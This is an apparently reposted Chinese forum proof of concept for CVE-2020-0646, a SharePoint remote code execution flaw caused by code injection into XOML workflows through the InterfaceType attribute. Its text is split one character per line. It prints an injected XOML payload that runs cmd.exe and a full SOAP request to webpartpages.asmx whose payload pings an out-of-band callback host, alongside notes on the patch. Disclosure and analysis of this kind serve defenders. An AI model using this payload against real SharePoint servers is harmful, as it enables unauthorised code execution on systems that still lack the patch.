论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[20451] 2021-01-06_CVE-2020-0646SharePointRCE-POC
文档创建者:
s7ckTeam
浏览次数:
3
最后更新:
2025-01-18
IOT
3 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2021-01-06_CVE-2020-0646SharePointRCE-POC
C
V
E
-
2
0
2
0
-
0
6
4
6
S
h
a
r
e
P
o
i
n
t
R
C
E
-
P
O
C
S
o
r
o
u
s
h
D
a
l
i
l
i
K
h
a
n
安
全
攻
防
实
验
室
2
0
2
1
-
0
1
-
0
6
工
作
流
中
的
代
码
注
入
导
致
S
h
a
r
e
P
o
i
n
t
R
C
E
(
C
V
E
-
2
0
2
0
-
0
6
4
6
)
说
明
2
0
1
9
年
1
1
月
向
微
软
报
告
了
S
h
a
r
e
P
o
i
n
t
O
n
l
i
n
e
中
通
过
工
作
流
代
码
注
入
的
远
程
代
码
执
行
问
题
,
该
问
题
在
在
线
平
台
上
立
即
得
到
了
解
决
。
然
而
,
主
要
问
题
已
于
2
0
2
0
年
1
月
在
.
N
E
T
框
架
中
进
行
了
修
补
。
因
此
,
没
有
2
0
2
0
年
1
月
.
N
E
T
补
丁
的
S
h
a
r
e
P
o
i
n
t
O
n
-
P
r
e
m
i
s
e
版
本
仍
然
受
到
影
响
。
需
要
注
意
的
是
,
当
I
I
S
支
持
.
X
O
M
L
扩
展
名
时
,
这
个
问
题
也
可
能
被
滥
用
于
文
件
上
传
攻
击
。
虽
然
这
个
漏
洞
的
影
响
与
之
前
发
现
的
以
下
缺
陷
相
同
,
因
为
它
们
都
影
响
同
一
个
模
块
,
但
它
使
用
了
不
同
的
技
术
,
而
且
它
不
是
绕
过
已
实
施
的
修
复
程
序
。
h
t
t
p
s
:
/
/
w
w
w
.
n
c
c
g
r
o
u
p
.
t
r
u
s
t
/
u
k
/
o
u
r
-
r
e
s
e
a
r
c
h
/
t
e
c
h
n
i
c
a
l
-
a
d
v
i
s
o
r
y
-
b
y
p
a
s
s
i
n
g
-
w
o
r
k
f
l
o
w
s
-
p
r
o
t
e
c
t
i
o
n
-
m
e
c
h
a
n
i
s
m
s
-
r
e
m
o
t
e
-
c
o
d
e
-
e
x
e
c
u
t
i
o
n
-
o
n
-
s
h
a
r
e
p
o
i
n
t
/
h
t
t
p
s
:
/
/
w
w
w
.
n
c
c
g
r
o
u
p
.
t
r
u
s
t
/
u
k
/
o
u
r
-
r
e
s
e
a
r
c
h
/
t
e
c
h
n
i
c
a
l
-
a
d
v
i
s
o
r
y
-
b
y
p
a
s
s
i
n
g
-
m
i
c
r
o
s
o
f
t
-
x
o
m
l
-
w
o
r
k
f
l
o
w
s
-
p
r
o
t
e
c
t
i
o
n
-
m
e
c
h
a
n
i
s
m
s
-
u
s
i
n
g
-
d
e
s
e
r
i
a
l
i
s
a
t
i
o
n
-
o
f
-
u
n
t
r
u
s
t
e
d
-
d
a
t
a
/
C
V
E
-
2
0
2
0
-
0
6
4
6
分
析
分
析
在
编
译
X
O
M
L
格
式
文
件
时
,
S
y
s
t
e
m
.
W
o
r
k
f
l
o
w
.
A
c
t
i
v
i
t
i
e
s
命
名
空
间
中
的
一
些
参
数
可
能
被
滥
用
,
在
S
h
a
r
e
P
o
i
n
t
服
务
器
上
运
行
任
意
代
码
。
这
个
问
题
还
绕
过
了
W
o
r
k
f
l
o
w
编
译
器
的
n
o
c
o
d
e
选
项
,
因
为
它
仍
然
可
以
执
行
任
意
代
码
。
以
下
X
O
M
L
文
件
显
示
了
使
用
C
a
l
l
E
x
t
e
r
n
a
l
M
e
t
h
o
d
A
c
t
i
v
i
t
y
类
时
的
一
个
例
子
。
I
n
t
e
r
f
a
c
e
T
y
p
e
属
性
的
值
在
编
译
过
程
中
被
注
入
到
生
成
的
临
时
C
#
文
件
中
:
因
此
,
可
以
从
函
数
中
逃
逸
出
运
行
代
码
。
需
要
注
意
的
是
,
其
他
字
符
串
类
型
属
性
(
如
上
例
中
的
M
e
t
h
o
d
N
a
m
e
)
都
被
正
确
验
证
或
转
义
,
而
I
n
t
e
r
f
a
c
e
T
y
p
e
属
性
受
到
影
响
。
C
o
d
e
A
c
t
i
v
i
t
y
类
的
E
x
e
c
u
t
e
C
o
d
e
参
数
也
同
样
受
到
影
响
,
但
它
在
S
h
a
r
e
P
o
i
n
t
O
n
l
i
n
e
版
本
上
没
有
被
授
权
,
只
能
在
O
n
-
P
r
e
m
i
s
e
版
本
上
工
作
。
其
他
活
动
也
可
能
被
滥
用
。
以
下
H
T
T
P
请
求
可
用
于
在
S
h
a
r
e
P
o
i
n
t
O
n
l
i
n
e
上
执
行
代
码
为
例
:
<
S
e
q
u
e
n
t
i
a
l
W
o
r
k
f
l
o
w
A
c
t
i
v
i
t
y
x
:
C
l
a
s
s
=
"
M
y
W
o
r
k
f
l
o
w
"
x
:
N
a
m
e
=
"
f
o
o
b
a
r
"
x
m
l
n
s
:
x
=
"
h
t
t
p
:
/
/
s
c
h
e
m
a
s
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
w
i
n
f
x
/
2
0
0
6
/
x
a
m
l
"
x
m
l
n
s
=
"
h
t
t
p
:
/
/
s
c
h
e
m
a
s
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
w
i
n
f
x
/
2
0
0
6
/
x
a
m
l
/
w
o
r
k
f
l
o
w
"
<
C
a
l
l
E
x
t
e
r
n
a
l
M
e
t
h
o
d
A
c
t
i
v
i
t
y
x
:
N
a
m
e
=
"
c
o
d
e
A
c
t
i
v
i
t
y
1
"
M
e
t
h
o
d
N
a
m
e
=
'
t
e
s
t
1
'
I
n
t
e
r
f
a
c
e
T
y
p
e
=
'
S
y
s
t
e
m
.
S
t
r
i
n
g
)
;
}
O
b
j
e
c
t
/
*
*
/
t
e
s
t
2
=
S
y
s
t
e
m
.
D
i
a
g
n
o
s
t
i
c
s
.
P
r
o
c
e
s
s
.
S
t
a
r
t
(
"
c
m
d
.
e
x
e
"
,
"
/
c
c
a
l
c
"
)
;
p
r
i
v
a
t
e
<
/
S
e
q
u
e
n
t
i
a
l
W
o
r
k
f
l
o
w
A
c
t
i
v
i
t
y
>
p
r
i
v
a
t
e
v
o
i
d
I
n
i
t
i
a
l
i
z
e
C
o
m
p
o
n
e
n
t
(
)
{
…
t
h
i
s
.
c
o
d
e
A
c
t
i
v
i
t
y
1
.
I
n
t
e
r
f
a
c
e
T
y
p
e
=
t
y
p
e
o
f
(
S
y
s
t
e
m
.
S
t
r
i
n
g
)
;
}
O
b
j
e
c
t
/
*
*
/
t
e
s
t
2
=
S
y
s
t
e
m
.
D
i
a
g
n
o
s
t
i
c
s
.
P
r
o
c
e
s
s
.
S
t
a
r
t
(
"
c
m
d
.
e
x
e
"
,
"
/
c
c
a
l
c
"
)
;
p
r
i
v
a
t
e
/
*
*
/
v
o
i
d
/
*
*
/
f
o
o
b
a
r
(
)
{
/
/
)
;
…
}
P
O
S
T
h
t
t
p
:
/
/
[
R
E
D
A
C
T
E
D
]
.
s
h
a
r
e
p
o
i
n
t
.
c
o
m
/
_
v
t
i
_
b
i
n
/
w
e
b
p
a
r
t
p
a
g
e
s
.
a
s
m
x
H
T
T
P
/
1
.
1
D
a
t
e
:
T
u
e
,
2
9
O
c
t
2
0
1
9
1
4
:
2
6
:
2
1
G
M
T
M
I
M
E
-
V
e
r
s
i
o
n
:
1
.
0
A
c
c
e
p
t
:
*
/
*
S
O
A
P
A
c
t
i
o
n
:
h
t
t
p
:
/
/
m
i
c
r
o
s
o
f
t
.
c
o
m
/
s
h
a
r
e
p
o
i
n
t
/
w
e
b
p
a
r
t
p
a
g
e
s
/
V
a
l
i
d
a
t
e
W
o
r
k
f
l
o
w
M
a
r
k
u
p
A
n
d
C
r
e
a
t
e
S
u
p
p
o
r
t
O
b
j
e
c
t
s
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
4
.
0
(
c
o
m
p
a
t
i
b
l
e
;
M
S
F
r
o
n
t
P
a
g
e
1
5
.
0
)
H
o
s
t
:
[
R
E
D
A
C
T
E
D
]
.
s
h
a
r
e
p
o
i
n
t
.
c
o
m
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
e
n
-
u
s
,
e
n
;
q
=
0
.
1
A
c
c
e
p
t
:
a
u
t
h
/
s
i
c
i
l
y
X
-
F
O
R
M
S
_
B
A
S
E
D
_
A
U
T
H
_
A
C
C
E
P
T
E
D
:
T
C
o
n
t
e
n
t
-
T
y
p
e
:
t
e
x
t
/
x
m
l
;
c
h
a
r
s
e
t
=
u
t
f
-
8
X
-
V
e
r
m
e
e
r
-
C
o
n
t
e
n
t
-
T
y
p
e
:
t
e
x
t
/
x
m
l
;
c
h
a
r
s
e
t
=
u
t
f
-
8
A
c
c
e
p
t
-
e
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
C
o
n
n
e
c
t
i
o
n
:
K
e
e
p
-
A
l
i
v
e
P
r
a
g
m
a
:
n
o
-
c
a
c
h
e
C
o
n
t
e
n
t
-
L
e
n
g
t
h
:
1
0
3
1
结
果
,
D
N
S
名
称
被
解
析
:
O
n
-
P
r
e
m
i
s
e
版
本
也
可
以
使
用
上
述
请
求
进
行
利
用
。
应
用
C
V
E
-
2
0
2
0
-
0
6
4
6
补
丁
后
,
会
检
查
工
作
流
中
的
所
有
X
M
L
元
素
和
属
性
,
以
确
保
它
们
只
包
含
有
限
数
量
的
允
许
字
符
。
因
此
,
当
使
用
所
选
的
n
o
c
o
d
e
选
项
时
,
不
再
可
能
在
默
认
配
置
中
向
生
成
的
C
#
代
码
中
注
入
任
意
代
码
。
参
考
文
献
:
h
t
t
p
s
:
/
/
w
w
w
.
m
d
s
e
c
.
c
o
.
u
k
/
2
0
2
0
/
0
1
/
c
o
d
e
-
i
n
j
e
c
t
i
o
n
-
i
n
-
w
o
r
k
f
l
o
w
s
-
l
e
a
d
i
n
g
-
t
o
-
s
h
a
r
e
p
o
i
n
t
-
r
c
e
-
c
v
e
-
2
0
2
0
-
0
6
4
6
/
?
f
b
c
l
i
d
=
I
w
A
R
0
b
4
Q
Z
x
d
Q
K
V
Y
N
-
E
S
6
2
r
d
t
9
y
N
5
M
M
z
f
g
p
K
7
D
k
d
k
b
I
q
4
4
F
l
m
-
O
D
i
u
q
z
e
I
g
l
U
Q
C
o
o
k
i
e
:
[
R
E
D
A
C
T
E
D
]
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
e
n
c
o
d
i
n
g
=
"
u
t
f
-
8
"
?
>
<
s
o
a
p
:
E
n
v
e
l
o
p
e
x
m
l
n
s
:
x
s
i
=
"
h
t
t
p
:
/
/
w
w
w
.
w
3
.
o
r
g
/
2
0
0
1
/
X
M
L
S
c
h
e
m
a
-
i
n
s
t
a
n
c
e
"
x
m
l
n
s
:
x
s
d
=
"
h
t
t
p
:
/
/
w
w
w
.
w
3
.
o
r
g
/
2
0
0
1
/
X
M
L
S
c
h
e
m
a
"
x
m
l
n
s
:
s
o
a
p
=
"
h
t
t
p
:
/
/
s
c
h
e
m
a
s
.
x
m
l
s
o
a
p
.
o
r
g
/
s
o
a
p
/
e
n
v
e
l
o
p
e
/
"
>
<
s
o
a
p
:
B
o
d
y
<
S
e
q
u
e
n
t
i
a
l
W
o
r
k
f
l
o
w
A
c
t
i
v
i
t
y
x
:
C
l
a
s
s
=
"
M
y
W
o
r
k
f
l
o
w
"
x
:
N
a
m
e
=
"
f
o
o
b
a
r
"
x
m
l
n
s
:
x
=
"
h
t
t
p
:
/
/
s
c
h
e
m
a
s
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
w
i
n
f
x
/
2
0
0
6
/
x
a
m
l
"
x
m
l
n
s
=
"
h
t
t
p
:
/
/
s
c
h
e
m
a
s
.
m
i
c
r
o
s
o
f
t
.
c
o
m
/
w
i
n
f
x
/
2
0
0
6
/
x
a
m
l
/
w
o
r
k
f
l
o
w
"
>
<
C
a
l
l
E
x
t
e
r
n
a
l
M
e
t
h
o
d
A
c
t
i
v
i
t
y
x
:
N
a
m
e
=
"
f
o
o
"
M
e
t
h
o
d
N
a
m
e
=
'
t
e
s
t
1
'
I
n
t
e
r
f
a
c
e
T
y
p
e
=
'
S
y
s
t
e
m
.
S
t
r
i
n
g
)
;
}
O
b
j
e
c
t
/
*
*
/
t
e
s
t
2
=
S
y
s
t
e
m
.
D
i
a
g
n
o
s
t
i
c
s
.
P
r
o
c
e
s
s
.
S
t
a
r
t
(
"
c
m
d
.
e
x
e
"
,
"
/
c
p
i
n
g
o
9
y
d
z
n
3
p
7
e
d
5
7
9
l
e
p
x
o
l
o
c
q
y
q
p
w
i
k
7
.
[
r
e
d
a
c
t
e
d
B
u
r
p
C
o
l
l
a
b
S
e
r
v
e
r
]
"
)
;
p
r
i
v
a
t
e
/
*
*
/
v
o
i
d
/
*
*
/
f
o
o
b
a
r
(
)
{
/
/
'
/
>
<
/
S
e
q
u
e
n
t
i
a
l
W
o
r
k
f
l
o
w
A
c
t
i
v
i
t
y
>
]
]
>
<
/
w
o
r
k
f
l
o
w
M
a
r
k
u
p
T
e
x
t
>
<
r
u
l
e
s
T
e
x
t
>
<
/
r
u
l
e
s
T
e
x
t
>
<
c
o
n
f
i
g
B
l
o
b
>
<
/
c
o
n
f
i
g
B
l
o
b
>
<
f
l
a
g
>
2
<
/
f
l
a
g
>
<
/
V
a
l
i
d
a
t
e
W
o
r
k
f
l
o
w
M
a
r
k
u
p
A
n
d
C
r
e
a
t
e
S
u
p
p
o
r
t
O
b
j
e
c
t
s
>
<
/
s
o
a
p
:
B
o
d
y
>
<
/
s
o
a
p
:
E
n
v
e
l
o
p
e
>
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
IOT